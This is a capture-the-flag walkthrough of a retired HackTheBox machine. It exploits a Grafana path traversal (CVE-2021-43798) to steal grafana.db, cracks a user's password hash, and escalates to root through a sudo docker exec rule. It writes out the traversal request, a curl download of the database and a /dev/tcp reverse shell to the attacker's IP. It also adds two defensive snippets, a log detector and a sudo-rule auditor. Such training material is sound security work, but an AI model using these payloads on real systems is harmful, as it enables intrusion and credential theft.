This is a retired machine that was released on the HackTheBox platform on July 1st, 2025. Let's give it a crack.
It involves exploiting Grafana via an LFI to retrieve a database file from which we extract password hashes. We convert and crack these hashes to obtain user access to the target machine. After this, we abuse docker exec to gain root access.
https://app.hackthebox.com/machines/673/writeups
Enumeration
Target IP: 10.129.64.73
Attacker IP: 10.10.14.92
nmap -sCVS 10.129.64.73 -oA data
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 63:47:0a:81:ad:0f:78:07:46:4b:15:52:4a:4d:1e:39 (RSA)
| 256 7d:a9:ac:fa:01:e8:dd:09:90:40:48:ec:dd:f3:08:be (ECDSA)
|_ 256 91:33:2d:1a:81:87:1a:84:d3:b9:0b:23:23:3d:19:4b (ED25519)
3000/tcp open http Grafana http
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Grafana
|_Requested resource was /login
| http-robots.txt: 1 disallowed entry
|_/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 3000 looks interesting. I open a web browser and head over to check it out.
http://10.129.64.73:3000
From the home page we can see that Grafana is running version 8.
We try to log in with the default credentials, admin:admin.
After doing some research for exploits on Grafana v8, we find one that we can attempt to use: https://www.exploit-db.com/exploits/50581
This directory traversal / arbitrary file read may allow us to read the credentials file so that we can log in to Grafana (or maybe we can even gather some more useful credentials and/or keys?).
https://grafana.com/docs/grafana/latest/setup-grafana/configure-grafana/
The Grafana documentation lets us know where to look for these credentials.
CVE-2021-43798
Taking a look at the script we got from ExploitDB, it looks like this is a basic LFI traversal. Let's try to exploit this manually first.
url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read
We intercept a request and edit our GET request to traverse and capture the /etc/passwd on the target machine. This request is successful!
Let's attempt to grab the grafana.db file to get our login credentials for Grafana.
Here is our new GET request for this:
GET /public/plugins/welcome/../../../../../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1
While looking through our response we find that we have two users, admin and boris.
It is going to be hard to look through the database in Burp Suite, so let's download the file onto our attacker machine where we can extract information in a more digestible format.
curl --path-as-is "http://10.129.64.73:3000/public/plugins/welcome/../../../../../../../../../../../../var/lib/grafana/grafana.db" --output grafana.db
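From the defender's side, the traversal above is visible in the web server or Grafana access log as long as the raw request path is logged. The following detector is an added example, not part of the original writeup or the exploit script; the log lines are constructed, and the function resolves each /public/plugins/ request against a synthetic root to see whether it escapes the plugin directory.

```python
"""Flag CVE-2021-43798-style traversal in Grafana access logs.
Added example, not part of the original writeup; the log lines are constructed."""
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed combined-format access log lines (not captured from the target).
SAMPLE_LOG = """\
10.10.14.92 - - [01/Jul/2025:14:10:01 +0000] "GET /public/plugins/welcome/../../../../../../../../../../../../etc/passwd HTTP/1.1" 200 2143
10.10.14.92 - - [01/Jul/2025:14:10:09 +0000] "GET /public/plugins/welcome/../../../../../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1" 200 745472
10.10.14.92 - - [01/Jul/2025:14:11:20 +0000] "GET /public/plugins/welcome/module.js HTTP/1.1" 200 1803
10.10.14.92 - - [01/Jul/2025:14:12:00 +0000] "GET /login HTTP/1.1" 200 31567
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')
PLUGIN_RE = re.compile(r'^/public/plugins/(?P<plugin>[^/]+)/(?P<rest>.*)$')

def traversal_target(raw_path):
    """Return the path a /public/plugins/<name>/... request escapes to, or None.

    Detection works on the *raw* request path: proxies that normalise before
    logging hide the attack, which is also why curl needed --path-as-is above.
    """
    path = unquote(raw_path.split('?', 1)[0])  # decode %2e/%2f variants too
    m = PLUGIN_RE.match(path)
    if not m:
        return None
    base = '/plugins/' + m.group('plugin')
    # Resolve the asset path against a synthetic root; a legitimate asset stays
    # under its plugin directory, a traversal normalises to somewhere above it.
    resolved = normpath(base + '/' + m.group('rest'))
    if resolved == base or resolved.startswith(base + '/'):
        return None
    return resolved  # e.g. '/etc/passwd' once the dot-dots climb past the root

def find_traversals(log_text):
    """Return (src, timestamp, status, escaped path) for every traversal request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = traversal_target(m.group('path'))
        if target is not None:
            hits.append((m.group('src'), m.group('ts'), int(m.group('status')), target))
    return hits
```

A 200 status on a flagged request means the file was actually served, which is the case to escalate; a patched Grafana answers such requests with an error.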
Credential Extraction
We open the database file via SQLite and view the data inside of the user table.
We find a hash along with a salt!
I save the hash along with the salt in a text file in this format
salt,hash
I try to run Hashcat on the text file boris but it appears that Hashcat can’t determine the structure of the input hash.
Grafana hashes user passwords with PBKDF2-HMAC-SHA256. It stores the resulting digest as a hexadecimal string and the salt as plaintext, which is not a format Hashcat recognises, so we need to convert the hash into one Hashcat can use.
We find this GitHub repo with a tool that converts the hash into a Hashcat-friendly format: https://github.com/iamaldi/grafana2hashcat
python grafana2hashcat.py -o borisconvert ~/Desktop/data/boris
Let's run Hashcat on our converted hash!
hashcat -m 10900 (borishash) (wordlist)
We are able to recover the password for boris.
We try the credentials to access the server using the boris user account and we are able to enter! From here we can grab our user flag.
Privilege Escalation
I will run linpeas in the background while performing some manual enumeration of the machine.
Upon running sudo -l, we are able to see that boris has interesting permissions on what he can run.
It looks like we need a container to target for docker exec.
Let's look for some containers.
ps aux | grep 'docker'
root 1543 0.0 0.4 711712 8972 ? Sl 14:05 0:00 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 -address /run/snap.docker/containerd/containerd.sock
We find a container that we can target
sudo docker exec --interactive --privileged --user root e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 whoami
We get an output!
Let's see if we can get a reverse shell going.
We set up a listener on our attacking machine
https://github.com/brightio/penelope
penelope -i 10.10.14.92 4444
Here is our reverse shell line; edit it with your own IP and port:
/bin/sh -i >& /dev/tcp/(ip)/(port) 0>&1
sudo docker exec --interactive --privileged --user root e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 /bin/sh -i >& /dev/tcp/10.10.14.92/4444 0>&1
Where is our root flag?!
Since our docker exec ran with --privileged, the process has the capabilities needed to mount the host's disk. As root, let's mount sda1 to get our flag.
mount /dev/sda1 /mnt/
From there we are able to view our root flag! Pwned.
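The root cause of this escalation is a sudo rule that lets boris run docker exec as root with caller-chosen arguments, so --privileged and --user root come for free. The following audit check is an added example, not part of the original writeup; the sudo -l output it parses is constructed to resemble such a rule, since the writeup does not reproduce the real one.

```python
"""Audit sudo -l output for Docker rules that hand out root on the host.
Added example, not part of the original writeup; the sudo -l text is constructed."""
import re
import shlex

# Constructed sudo -l output (not the real rule on the box).
SAMPLE_SUDO_L = """\
Matching Defaults entries for boris on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User boris may run the following commands on this host:
    (root) NOPASSWD: /snap/bin/docker exec *
    (root) NOPASSWD: /snap/bin/docker logs grafana
    (root) NOPASSWD: /usr/bin/systemctl restart grafana-server
"""

RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)(?P<args>.*)$')

def audit_sudo_rules(sudo_l_output):
    """Return one finding per rule that lets the user drive Docker as root.

    A trailing '*' is the real problem: the caller can append --privileged and
    --user root, so 'docker exec' into any container becomes a root process with
    every capability, able to mount the host's disks the way the writeup does.
    A rule pinned to a fixed command line (docker logs grafana) is not flagged.
    """
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group('runas').split(':')[0].strip()
        argv = shlex.split(m.group('cmd') + m.group('args'))
        binary = argv[0].rsplit('/', 1)[-1]
        if runas not in ('root', 'ALL') or binary not in ('docker', 'podman'):
            continue
        subcmd = argv[1] if len(argv) > 1 else '*'
        wildcard = '*' in argv[1:]
        if subcmd in ('*', 'exec', 'run') or wildcard:
            findings.append({
                'rule': line.strip(),
                'nopasswd': 'NOPASSWD:' in m.group('tags'),
                'reason': ('wildcard args allow --privileged --user root' if wildcard
                           else f'docker {subcmd} runs as root on the host'),
            })
    return findings
```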